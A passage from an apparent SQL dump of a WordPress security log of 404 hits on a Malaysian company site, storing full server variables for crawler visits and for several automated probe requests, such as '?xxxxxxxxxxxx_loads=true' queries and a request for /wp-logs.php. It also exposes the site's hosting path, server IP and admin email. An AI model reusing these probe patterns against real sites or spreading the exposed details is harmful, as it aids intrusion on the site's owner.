14:04:47',35036992,36835600,'https://bintara.com.my/v1/?xxxxxxxxxxxx_loads=true',1,0,'37.187.198.246'),(27544,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/toughpad-fz-m1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-m1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/toughpad-fz-m1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZilSEIBnEjhLICWLzOBGQAAAQo\";s:12:\"REDIRECT_URL\";s:16:\"/toughpad-fz-m1/\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.150.186\";s:11:\"REMOTE_PORT\";s:5:\"39452\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-m1/\";s:10:\"SCRIPT_URL\";s:16:\"/toughpad-fz-m1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZilSEIBnEjhLICWLzOBGQAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570284872.1196\";s:12:\"REQUEST_TIME\";s:10:\"1570284872\";}}','notice','2019-10-05 14:14:34','2019-10-05 14:14:32',35521272,37330856,'https://bintara.com.my/toughpad-fz-m1/',1,0,'54.36.150.186'),(27545,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/test/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/test/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZiplUGaeXEybixQimR2ZwAAANI\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/test/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZiplUGaeXEybixQimR2ZwAAANI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.81.46\";s:11:\"REMOTE_PORT\";s:5:\"34412\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:10:\"SCRIPT_URL\";s:6:\"/test/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZiplUGaeXEybixQimR2ZwAAANI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570285974.2786\";s:12:\"REQUEST_TIME\";s:10:\"1570285974\";}}','notice','2019-10-05 14:32:56','2019-10-05 14:32:54',35035488,36843696,'https://bintara.com.my/test/?xxxxxxxxxxxx_loads=true',1,0,'159.203.81.46'),(27546,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.161.131.48\";s:11:\"REMOTE_PORT\";s:5:\"55604\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZiuVkGaeXEybixQimR6QwAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570287190.2086\";s:12:\"REQUEST_TIME\";s:10:\"1570287190\";}}','notice','2019-10-05 14:53:13','2019-10-05 14:53:10',35414744,37230240,'https://bintara.com.my/?page_id=18',1,0,'108.161.131.48'),(27547,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/blogs/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:7:\"/blogs/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZjBFhIkVaLRYqSs9rfwVwAAABI\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/blogs/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZjBFhIkVaLRYqSs9rfwVwAAABI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.135.138.188\";s:11:\"REMOTE_PORT\";s:5:\"41660\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/blogs/\";s:10:\"SCRIPT_URL\";s:7:\"/blogs/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XZjBFhIkVaLRYqSs9rfwVwAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570291991.0628\";s:12:\"REQUEST_TIME\";s:10:\"1570291991\";}}','notice','2019-10-05 16:13:13','2019-10-05 16:13:11',35035720,36838736,'https://bintara.com.my/blogs/?xxxxxxxxxxxx_loads=true',1,0,'5.135.138.188'),(27548,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/ptz-pro/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/ptz-pro/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZjFekIBnEjhLICWLzOUwQAAARY\";s:12:\"REDIRECT_URL\";s:9:\"/ptz-pro/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.161\";s:11:\"REMOTE_PORT\";s:5:\"10175\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:10:\"SCRIPT_URL\";s:9:\"/ptz-pro/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZjFekIBnEjhLICWLzOUwQAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570293114.7778\";s:12:\"REQUEST_TIME\";s:10:\"1570293114\";}}','notice','2019-10-05 16:31:58','2019-10-05 16:31:55',34368488,36164680,'https://bintara.com.my/ptz-pro/',1,0,'157.55.39.161'),(27549,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/wp2/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/wp2/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZjGv-aSoa86rX5HNFOsXgAAAFA\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/wp2/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZjGv-aSoa86rX5HNFOsXgAAAFA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"47436\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/wp2/\";s:10:\"SCRIPT_URL\";s:5:\"/wp2/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZjGv-aSoa86rX5HNFOsXgAAAFA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570293439.1177\";s:12:\"REQUEST_TIME\";s:10:\"1570293439\";}}','notice','2019-10-05 16:37:20','2019-10-05 16:37:19',35037568,36841544,'https://bintara.com.my/wp2/?xxxxxxxxxxxx_loads=true',1,0,'51.255.43.81'),(27550,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:88:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"202.43.117.134\";s:11:\"REMOTE_PORT\";s:5:\"49169\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZjNcUIBnEjhLICWLzOZCwAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570295153.2559\";s:12:\"REQUEST_TIME\";s:10:\"1570295153\";}}','notice','2019-10-05 17:05:54','2019-10-05 17:05:53',35029120,36837880,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'202.43.117.134'),(27551,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/dev/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:5:\"/dev/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZjPS0IBnEjhLICWLzOZ9QAAAQQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:19:\"REDIRECT_SCRIPT_URL\";s:5:\"/dev/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZjPS0IBnEjhLICWLzOZ9QAAAQQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"188.213.166.219\";s:11:\"REMOTE_PORT\";s:5:\"38265\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:27:\"https://bintara.com.my/dev/\";s:10:\"SCRIPT_URL\";s:5:\"/dev/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XZjPS0IBnEjhLICWLzOZ9QAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570295629.2841\";s:12:\"REQUEST_TIME\";s:10:\"1570295629\";}}','notice','2019-10-05 17:13:51','2019-10-05 17:13:49',35035440,36836512,'https://bintara.com.my/dev/?xxxxxxxxxxxx_loads=true',1,0,'188.213.166.219'),(27552,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/wp-logs.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-logs.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-logs.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZjS0kIBnEjhLICWLzObkQAAARY\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-logs.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-logs.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZjS0kIBnEjhLICWLzObkQAAARY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.68.11.211\";s:11:\"REMOTE_PORT\";s:5:\"59780\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s